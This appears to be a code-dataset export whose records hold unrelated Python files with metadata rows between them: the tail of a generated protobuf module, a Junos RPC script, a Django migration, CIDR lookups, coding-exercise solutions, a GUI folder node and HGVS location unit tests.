_DEVICEVERIFICATIONRESPONSE._serialized_end=8951
_DEVICEAPPROVALREQUEST._serialized_start=8954
_DEVICEAPPROVALREQUEST._serialized_end=9154
_DEVICEAPPROVALRESPONSE._serialized_start=9156
_DEVICEAPPROVALRESPONSE._serialized_end=9213
_APPROVEDEVICEREQUEST._serialized_start=9215
_APPROVEDEVICEREQUEST._serialized_end=9341
_ENTERPRISEUSERALIASREQUEST._serialized_start=9343
_ENTERPRISEUSERALIASREQUEST._serialized_end=9412
_ENTERPRISEUSERADDALIASREQUEST._serialized_start=9414
_ENTERPRISEUSERADDALIASREQUEST._serialized_end=9503
_DEVICE._serialized_start=9505
_DEVICE._serialized_end=9543
_REGISTERDEVICEDATAKEYREQUEST._serialized_start=9545
_REGISTERDEVICEDATAKEYREQUEST._serialized_end=9637
_VALIDATECREATEUSERVERIFICATIONCODEREQUEST._serialized_start=9639
_VALIDATECREATEUSERVERIFICATIONCODEREQUEST._serialized_end=9749
_VALIDATEDEVICEVERIFICATIONCODEREQUEST._serialized_start=9752
_VALIDATEDEVICEVERIFICATIONCODEREQUEST._serialized_end=9915
_SENDSESSIONMESSAGEREQUEST._serialized_start=9917
_SENDSESSIONMESSAGEREQUEST._serialized_end=10006
_GLOBALUSERACCOUNT._serialized_start=10008
_GLOBALUSERACCOUNT._serialized_end=10085
_ACCOUNTUSERNAME._serialized_start=10087
_ACCOUNTUSERNAME._serialized_end=10142
_SSOSERVICEPROVIDERREQUEST._serialized_start=10144
_SSOSERVICEPROVIDERREQUEST._serialized_end=10224
_SSOSERVICEPROVIDERRESPONSE._serialized_start=10226
_SSOSERVICEPROVIDERRESPONSE._serialized_end=10323
_USERSETTINGREQUEST._serialized_start=10325
_USERSETTINGREQUEST._serialized_end=10377
_THROTTLESTATE._serialized_start=10379
_THROTTLESTATE._serialized_end=10481
_THROTTLESTATE2._serialized_start=10484
_THROTTLESTATE2._serialized_end=10665
_DEVICEINFORMATION._serialized_start=10668
_DEVICEINFORMATION._serialized_end=10819
_USERSETTING._serialized_start=10821
_USERSETTING._serialized_end=10863
_USERDATAKEYREQUEST._serialized_start=10865
_USERDATAKEYREQUEST._serialized_end=10911
_ENTERPRISEUSERIDDATAKEYPAIR._serialized_start=10913
_ENTERPRISEUSERIDDATAKEYPAIR._serialized_end=10994
_USERDATAKEY._serialized_start=10997
_USERDATAKEY._serialized_end=11146
_USERDATAKEYRESPONSE._serialized_start=11148
_USERDATAKEYRESPONSE._serialized_end=11270
_MASTERPASSWORDRECOVERYVERIFICATIONREQUEST._serialized_start=11272
_MASTERPASSWORDRECOVERYVERIFICATIONREQUEST._serialized_end=11344
_GETSECURITYQUESTIONV3REQUEST._serialized_start=11346
_GETSECURITYQUESTIONV3REQUEST._serialized_end=11431
_GETSECURITYQUESTIONV3RESPONSE._serialized_start=11433
_GETSECURITYQUESTIONV3RESPONSE._serialized_end=11547
_GETDATAKEYBACKUPV3REQUEST._serialized_start=11549
_GETDATAKEYBACKUPV3REQUEST._serialized_end=11659
_PASSWORDRULES._serialized_start=11661
_PASSWORDRULES._serialized_end=11779
_GETDATAKEYBACKUPV3RESPONSE._serialized_start=11782
_GETDATAKEYBACKUPV3RESPONSE._serialized_end=12073
_GETPUBLICKEYSREQUEST._serialized_start=12075
_GETPUBLICKEYSREQUEST._serialized_end=12116
_PUBLICKEYRESPONSE._serialized_start=12118
_PUBLICKEYRESPONSE._serialized_end=12232
_GETPUBLICKEYSRESPONSE._serialized_start=12234
_GETPUBLICKEYSRESPONSE._serialized_end=12314
_SETECCKEYPAIRREQUEST._serialized_start=12316
_SETECCKEYPAIRREQUEST._serialized_end=12386
_ADDAPPSHARESREQUEST._serialized_start=12388
_ADDAPPSHARESREQUEST._serialized_end=12476
_REMOVEAPPSHARESREQUEST._serialized_start=12478
_REMOVEAPPSHARESREQUEST._serialized_end=12540
_APPSHAREADD._serialized_start=12543
_APPSHAREADD._serialized_end=12678
_APPSHARE._serialized_start=12680
_APPSHARE._serialized_end=12803
_ADDAPPCLIENTREQUEST._serialized_start=12806
_ADDAPPCLIENTREQUEST._serialized_end=12973
_REMOVEAPPCLIENTSREQUEST._serialized_start=12975
_REMOVEAPPCLIENTSREQUEST._serialized_end=13039
_ADDEXTERNALSHAREREQUEST._serialized_start=13041
_ADDEXTERNALSHAREREQUEST._serialized_end=13167
_APPCLIENT._serialized_start=13170
_APPCLIENT._serialized_end=13378
_GETAPPINFOREQUEST._serialized_start=13380
_GETAPPINFOREQUEST._serialized_end=13421
_APPINFO._serialized_start=13424
_APPINFO._serialized_end=13566
_GETAPPINFORESPONSE._serialized_start=13568
_GETAPPINFORESPONSE._serialized_end=13630
_APPLICATIONSUMMARY._serialized_start=13633
_APPLICATIONSUMMARY._serialized_end=13811
_GETAPPLICATIONSSUMMARYRESPONSE._serialized_start=13813
_GETAPPLICATIONSSUMMARYRESPONSE._serialized_end=13909
_GETVERIFICATIONTOKENREQUEST._serialized_start=13911
_GETVERIFICATIONTOKENREQUEST._serialized_end=13958
_GETVERIFICATIONTOKENRESPONSE._serialized_start=13960
_GETVERIFICATIONTOKENRESPONSE._serialized_end=14026
_SENDSHAREINVITEREQUEST._serialized_start=14028
_SENDSHAREINVITEREQUEST._serialized_end=14067
_TIMELIMITEDACCESSREQUEST._serialized_start=14070
_TIMELIMITEDACCESSREQUEST._serialized_end=14267
_TIMELIMITEDACCESSRESPONSE._serialized_start=14269
_TIMELIMITEDACCESSRESPONSE._serialized_end=14314
_REQUESTDOWNLOADREQUEST._serialized_start=14316
_REQUESTDOWNLOADREQUEST._serialized_end=14359
_REQUESTDOWNLOADRESPONSE._serialized_start=14361
_REQUESTDOWNLOADRESPONSE._serialized_end=14464
_DOWNLOAD._serialized_start=14466
_DOWNLOAD._serialized_end=14534
_DELETEUSERREQUEST._serialized_start=14536
_DELETEUSERREQUEST._serialized_end=14571
# @@protoc_insertion_point(module_scope)
| 67.03569 | 31,474 | 0.827611 | 11,190 | 99,548 | 7.042002 | 0.110903 | 0.012881 | 0.020241 | 0.037157 | 0.319099 | 0.223338 | 0.195495 | 0.174505 | 0.162855 | 0.054467 | 0 | 0.097644 | 0.05301 | 99,548 | 1,484 | 31,475 | 67.080863 | 0.738244 | 0.092478 | 0 | 0.199184 | 1 | 0.03102 | 0.351114 | 0.271023 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.03102 | 0.005714 | 0 | 0.005714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a103c3ae6b71b6f0c6563f7413a2d17a9d5b35b | 142 | py | Python | CZ1003/tutorial/cz1003_tut4-2.py | khamiruf/NTU_CompSci | 6c013c8653cdca275d1a0a70f8e0896815bedef3 | [
"CNRI-Python"
] | null | null | null | CZ1003/tutorial/cz1003_tut4-2.py | khamiruf/NTU_CompSci | 6c013c8653cdca275d1a0a70f8e0896815bedef3 | [
"CNRI-Python"
] | null | null | null | CZ1003/tutorial/cz1003_tut4-2.py | khamiruf/NTU_CompSci | 6c013c8653cdca275d1a0a70f8e0896815bedef3 | [
"CNRI-Python"
] | null | null | null | def max(a, b):
if a > b:
return a
elif b > a:
return b
else:
return 'a = b'
print(max(123,445))
| 14.2 | 23 | 0.408451 | 22 | 142 | 2.636364 | 0.5 | 0.103448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 0.471831 | 142 | 9 | 24 | 15.777778 | 0.693333 | 0 | 0 | 0 | 0 | 0 | 0.037594 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.5 | 0.125 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a1522c78029e8e78d6169b881202b65d56797c2 | 282 | py | Python | on-box-python/op-scripts/rpc_execute.py | Juniper/junosautomation | 98938d964254606d259c41222adc83f341d73c00 | [
"Apache-2.0"
] | 117 | 2016-08-22T15:52:28.000Z | 2022-01-08T00:53:28.000Z | on-box-python/op-scripts/rpc_execute.py | hujie331/junosautomation | 98938d964254606d259c41222adc83f341d73c00 | [
"Apache-2.0"
] | 12 | 2017-10-28T09:44:44.000Z | 2018-11-21T15:12:42.000Z | on-box-python/op-scripts/rpc_execute.py | hujie331/junosautomation | 98938d964254606d259c41222adc83f341d73c00 | [
"Apache-2.0"
] | 78 | 2016-08-19T05:35:28.000Z | 2022-03-13T07:16:27.000Z | from jnpr.junos import Device
from lxml import etree
with Device() as jdev:
#with Device(host=<hostname>, user=<user>, password=<password>) as jdev:
rsp = jdev.rpc.get_interface_information(interface_name='fxp0', terse=True)
print (etree.tostring(rsp, encoding='unicode'))
| 35.25 | 79 | 0.744681 | 40 | 282 | 5.175 | 0.675 | 0.096618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004032 | 0.120567 | 282 | 7 | 80 | 40.285714 | 0.830645 | 0.251773 | 0 | 0 | 0 | 0 | 0.052381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6a16f0e08a891229cf156b400e9c36efd2cca28f | 927 | py | Python | Level2/Lessons12924/gamjapark.py | StudyForCoding/ProgrammersLevel | dc957b1c02cc4383a93b8cbf3d739e6c4d88aa25 | [
"MIT"
] | null | null | null | Level2/Lessons12924/gamjapark.py | StudyForCoding/ProgrammersLevel | dc957b1c02cc4383a93b8cbf3d739e6c4d88aa25 | [
"MIT"
] | null | null | null | Level2/Lessons12924/gamjapark.py | StudyForCoding/ProgrammersLevel | dc957b1c02cc4383a93b8cbf3d739e6c4d88aa25 | [
"MIT"
] | 1 | 2021-04-05T07:35:59.000Z | 2021-04-05T07:35:59.000Z | # 숫자의 표현
def solution(n):
answer = 0
numSum = 0
sNum = 1
for i in range(1, n+1):
numSum += i
while numSum > n:
numSum -= sNum
sNum += 1
if numSum == n:
answer += 1
return answer
'''
채점을 시작합니다.
정확성 테스트
테스트 1 〉 통과 (0.01ms, 10.1MB)
테스트 2 〉 통과 (0.13ms, 10.1MB)
테스트 3 〉 통과 (0.11ms, 10.1MB)
테스트 4 〉 통과 (0.11ms, 10.2MB)
테스트 5 〉 통과 (0.04ms, 10.1MB)
테스트 6 〉 통과 (0.01ms, 10.2MB)
테스트 7 〉 통과 (0.10ms, 10.2MB)
테스트 8 〉 통과 (0.05ms, 10.2MB)
테스트 9 〉 통과 (0.01ms, 10.2MB)
테스트 10 〉 통과 (0.20ms, 10.1MB)
테스트 11 〉 통과 (0.17ms, 10.1MB)
테스트 12 〉 통과 (0.11ms, 10.1MB)
테스트 13 〉 통과 (0.12ms, 10.1MB)
테스트 14 〉 통과 (0.09ms, 10.2MB)
효율성 테스트
테스트 1 〉 통과 (1.63ms, 10.1MB)
테스트 2 〉 통과 (1.33ms, 10.2MB)
테스트 3 〉 통과 (1.42ms, 10.1MB)
테스트 4 〉 통과 (1.33ms, 10.2MB)
테스트 5 〉 통과 (1.40ms, 10.2MB)
테스트 6 〉 통과 (1.40ms, 10.2MB)
채점 결과
정확성: 70.0
효율성: 30.0
합계: 100.0 / 100.0
'''
| 20.152174 | 28 | 0.521036 | 213 | 927 | 2.361502 | 0.276995 | 0.119284 | 0.111332 | 0.047714 | 0.395626 | 0.335984 | 0.190855 | 0 | 0 | 0 | 0 | 0.258165 | 0.306365 | 927 | 45 | 29 | 20.6 | 0.493002 | 0.006472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a194449385214eb49c1fcfe773e8e618437b8ee | 552 | py | Python | core/migrations/0003_auto_20190122_0222.py | v-adhithyan/india-elections | 504772bd90bffaab32bad473523731021315afd1 | [
"MIT"
] | 7 | 2018-09-14T06:42:36.000Z | 2019-06-14T03:46:14.000Z | core/migrations/0003_auto_20190122_0222.py | v-adhithyan/india-elections | 504772bd90bffaab32bad473523731021315afd1 | [
"MIT"
] | 40 | 2019-01-01T01:56:20.000Z | 2022-03-11T23:40:57.000Z | core/migrations/0003_auto_20190122_0222.py | v-adhithyan/india-elections | 504772bd90bffaab32bad473523731021315afd1 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.4 on 2019-01-22 02:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_auto_20190114_0136'),
]
operations = [
migrations.AddField(
model_name='tweetstats',
name='female',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='tweetstats',
name='male',
field=models.PositiveIntegerField(default=0),
),
]
| 23 | 57 | 0.583333 | 53 | 552 | 5.981132 | 0.660377 | 0.113565 | 0.14511 | 0.170347 | 0.504732 | 0.258675 | 0 | 0 | 0 | 0 | 0 | 0.085938 | 0.304348 | 552 | 23 | 58 | 24 | 0.739583 | 0.081522 | 0 | 0.470588 | 1 | 0 | 0.112871 | 0.045545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a2255ed18f3a43208b5113c6bb70eddd326a41f | 835 | py | Python | cidrfield/lookups.py | giantatwork/django-cidrfield | 377f3fbbf0d7db8bff63d7ff5ef55f9d7e55917a | [
"MIT"
] | 1 | 2020-04-21T09:47:56.000Z | 2020-04-21T09:47:56.000Z | cidrfield/lookups.py | giantatwork/django-cidrfield | 377f3fbbf0d7db8bff63d7ff5ef55f9d7e55917a | [
"MIT"
] | null | null | null | cidrfield/lookups.py | giantatwork/django-cidrfield | 377f3fbbf0d7db8bff63d7ff5ef55f9d7e55917a | [
"MIT"
] | 2 | 2020-03-05T14:10:56.000Z | 2021-04-06T10:58:58.000Z | from django.db.models import Lookup
class IpContains(Lookup):
lookup_name = 'contains'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = rhs_params + lhs_params
return '%s like %s' % (rhs, lhs), params
class IpIn(Lookup):
lookup_name = 'in'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
params = lhs_params + rhs_params
condition = '%s like %s' % (lhs, rhs)
if isinstance(params[0], list):
return ' or '.join([condition] * len(params[0])), tuple(params[0])
else:
return condition, params
| 32.115385 | 78 | 0.637126 | 104 | 835 | 4.961538 | 0.336538 | 0.209302 | 0.131783 | 0.046512 | 0.48062 | 0.48062 | 0.48062 | 0.48062 | 0.48062 | 0.48062 | 0 | 0.004785 | 0.249102 | 835 | 25 | 79 | 33.4 | 0.818182 | 0 | 0 | 0.315789 | 0 | 0 | 0.040719 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6a2693246d8286ad07e62c1afa099dcc47d905c0 | 603 | py | Python | Dataset/Leetcode/train/112/448.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/112/448.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/112/448.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, root, sum):
"""
:type root: TreeNode
:type sum: int
:rtype: bool
"""
count=0
ret=[]
def dfs(root,count):
if root:
count+=root.val
if not root.left and not root.right:
if count==sum:
ret.append(True)
return
else:
dfs(root.left,count)
dfs(root.right,count)
dfs(root,count)
ret.append(False)
return ret[0]
| 25.125 | 52 | 0.402985 | 61 | 603 | 3.983607 | 0.459016 | 0.115226 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006645 | 0.500829 | 603 | 23 | 53 | 26.217391 | 0.800664 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a31d508ec9acff1c86f618fe7b0d865c41dfa7e | 394 | py | Python | avrng.py | Perkoz19/avrng | 9c7222a8243acf82a06b5f63bee87002ef7222cd | [
"MIT"
] | null | null | null | avrng.py | Perkoz19/avrng | 9c7222a8243acf82a06b5f63bee87002ef7222cd | [
"MIT"
] | null | null | null | avrng.py | Perkoz19/avrng | 9c7222a8243acf82a06b5f63bee87002ef7222cd | [
"MIT"
] | null | null | null | from video import VideoHandler
from audio import AudioHandler
class Avrng():
def __init__(self, video_source, audio_source):
self.video_source = VideoHandler(video_source)
self.audio_source = AudioHandler(audio_source)
def get_byte(self):
# TODO avrng algorithm
pass
if __name__ == "__main__":
#TODO cli app
print("Not implemented yet")
| 21.888889 | 54 | 0.685279 | 47 | 394 | 5.340426 | 0.553191 | 0.131474 | 0.119522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238579 | 394 | 17 | 55 | 23.176471 | 0.836667 | 0.081218 | 0 | 0 | 0 | 0 | 0.075209 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 1 | 0.2 | false | 0.1 | 0.2 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
6a36dd30d2e96e7eaa2162720caeca38be167447 | 1,464 | py | Python | core/template_parser/nodes/folder.py | GeorgOhneH/ethz-document-fetcher | 42921e5d71698a269eb54cf9d3979e4a7d88a9cf | [
"MIT"
] | 15 | 2020-03-17T15:43:46.000Z | 2022-01-08T04:23:49.000Z | core/template_parser/nodes/folder.py | GeorgOhneH/ethz-document-fetcher | 42921e5d71698a269eb54cf9d3979e4a7d88a9cf | [
"MIT"
] | 5 | 2020-03-12T10:05:27.000Z | 2021-03-03T16:01:47.000Z | core/template_parser/nodes/folder.py | GeorgOhneH/ethz-document-fetcher | 42921e5d71698a269eb54cf9d3979e4a7d88a9cf | [
"MIT"
] | 2 | 2020-03-17T17:09:20.000Z | 2020-12-28T22:59:17.000Z | import os
from core.template_parser.nodes.base import TemplateNode, NodeConfigs
from gui.constants import ASSETS_PATH
from settings.config_objs import ConfigString
class FolderConfigs(NodeConfigs):
TYPE = "folder"
TITLE_NAME = "Folder"
name = ConfigString(gui_name="Name")
def get_name(self):
if self.name is not None:
return self.name
return "+ Add Folder"
def get_folder_name(self):
return self.name
def get_icon_path(self):
return Folder.FOLDER_ICON_PATH
class Folder(TemplateNode):
FOLDER_ICON_PATH = os.path.join(ASSETS_PATH, "folder.svg")
def __init__(self, name, parent, **kwargs):
super().__init__(parent=parent,
folder_name=name,
unique_key_kwargs=dict(name=name),
**kwargs)
self.name = name
def __str__(self):
return self.name
def convert_to_dict(self, result=None):
result = {"folder": self.name}
return super().convert_to_dict(result=result)
def get_gui_name(self):
return self.name
def get_gui_icon_path(self):
return self.FOLDER_ICON_PATH
def get_type_name(self):
return "Folder"
def get_configs(self):
folder_configs = FolderConfigs(super().get_configs())
try:
folder_configs.name = self.name
except ValueError:
pass
return folder_configs
| 25.241379 | 69 | 0.630464 | 178 | 1,464 | 4.91573 | 0.292135 | 0.082286 | 0.064 | 0.061714 | 0.088 | 0.064 | 0.064 | 0 | 0 | 0 | 0 | 0 | 0.282787 | 1,464 | 57 | 70 | 25.684211 | 0.833333 | 0 | 0 | 0.095238 | 0 | 0 | 0.034153 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238095 | false | 0.02381 | 0.095238 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
6a3eb9cc2ab23e7842d44b902fa7f14075ddefa5 | 9,112 | py | Python | tests/test_hgvs_location.py | John-F-Wagstaff/vv_hgvs | 14e06ec1409fee0fdb4bcdbc33eb608db6ece08c | [
"Apache-2.0"
] | 2 | 2020-11-13T02:40:26.000Z | 2021-01-15T03:09:52.000Z | tests/test_hgvs_location.py | John-F-Wagstaff/vv_hgvs | 14e06ec1409fee0fdb4bcdbc33eb608db6ece08c | [
"Apache-2.0"
] | 1 | 2022-03-08T05:31:10.000Z | 2022-03-08T05:31:10.000Z | tests/test_hgvs_location.py | John-F-Wagstaff/vv_hgvs | 14e06ec1409fee0fdb4bcdbc33eb608db6ece08c | [
"Apache-2.0"
] | 3 | 2020-06-24T09:18:06.000Z | 2021-02-02T12:47:57.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import pytest
from vvhgvs.exceptions import HGVSError, HGVSUnsupportedOperationError
from vvhgvs.enums import Datum
import vvhgvs.location
import vvhgvs.parser
@pytest.mark.quick
@pytest.mark.models
class Test_SimplePosition(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.hp = vvhgvs.parser.Parser()
def test_success(self):
self.assertEqual(str(vvhgvs.location.SimplePosition(5)), "5")
self.assertEqual(str(vvhgvs.location.SimplePosition(5, uncertain=True)), "(5)")
self.assertEqual(str(vvhgvs.location.SimplePosition(None)), "?")
def test_failure(self):
with self.assertRaises(AssertionError):
self.assertEqual(vvhgvs.location.SimplePosition(-1), "SHOULD FAIL")
def test_simple_subtraction(self):
self.assertEqual(vvhgvs.location.SimplePosition(5) - vvhgvs.location.SimplePosition(3), 2)
def test_simple_comparision(self):
var = self.hp.parse_hgvs_variant("NC_000007.13:g.36561662_36561683del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NC_000007.13:g.36561662C>T")
self.assertTrue(var.posedit.pos.start == var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start >= var.posedit.pos.end)
@pytest.mark.quick
class Test_BaseOffsetPosition(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.hp = vvhgvs.parser.Parser()
def test_success(self):
# r.5
cdsp = vvhgvs.location.BaseOffsetPosition(5)
self.assertEqual(cdsp.datum, Datum.SEQ_START)
self.assertEqual(cdsp.base, 5)
self.assertEqual(cdsp.offset, 0)
self.assertEqual(str(cdsp), "5")
self.assertFalse(cdsp.is_intronic)
#r.5+6
cdsp.offset = 6
self.assertEqual(str(cdsp), "5+6")
self.assertTrue(cdsp.is_intronic)
#r.5+?
cdsp.offset = None
self.assertEqual(str(cdsp), "5+?")
self.assertTrue(cdsp.is_intronic)
#r.(5+?)
cdsp.uncertain = True
self.assertEqual(str(cdsp), "(5+?)")
# c.*5
cdsp = vvhgvs.location.BaseOffsetPosition(5, datum=Datum.CDS_END)
self.assertEqual(cdsp.datum, Datum.CDS_END)
self.assertEqual(cdsp.base, 5)
self.assertEqual(cdsp.offset, 0)
self.assertEqual(str(cdsp), "*5")
cdsp.uncertain = True
self.assertEqual(str(cdsp), "(*5)")
cdsp.offset = 7
self.assertEqual(str(cdsp), "(*5+7)")
def test_baseoffset_subtraction(self):
v30 = vvhgvs.location.BaseOffsetPosition(3, 0)
v50 = vvhgvs.location.BaseOffsetPosition(5, 0)
v52 = vvhgvs.location.BaseOffsetPosition(5, 2)
v54 = vvhgvs.location.BaseOffsetPosition(5, 4)
self.assertEqual(v50 - v30, 2)
with self.assertRaises(HGVSError):
_ = v54 - v30
def test_baseoffset_comparision(self):
var = self.hp.parse_hgvs_variant("NM_000030.2:c.669_680del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.679_680+2del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.-6_680+2del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_680+10del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_*82del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.-12_*82del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_681del")
self.assertFalse(var.posedit.pos.start == var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
self.assertTrue(var.posedit.pos.start <= var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start > var.posedit.pos.end)
self.assertFalse(var.posedit.pos.start >= var.posedit.pos.end)
var = self.hp.parse_hgvs_variant("NM_000030.2:c.680+2_681-32del")
with self.assertRaises(HGVSUnsupportedOperationError):
var.posedit.pos.start < var.posedit.pos.end
@pytest.mark.quick
class Test_AAPosition(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.hp = vvhgvs.parser.Parser()
def test_AAPosition(self):
ap = vvhgvs.location.AAPosition(15, "S")
self.assertEqual(ap.pos, 15)
self.assertEqual(str(ap), "Ser15")
def test_aaposition_subtraction(self):
l1 = vvhgvs.location.AAPosition(15, 'S')
l2 = vvhgvs.location.AAPosition(20, 'S')
self.assertEqual(l2 - l1, 5)
def test_aaposition_comparision(self):
var = self.hp.parse_hgvs_variant("NP_000042.3:p.His1082_Val1085delinsLeuHisGlnAla")
self.assertTrue(var.posedit.pos.start < var.posedit.pos.end)
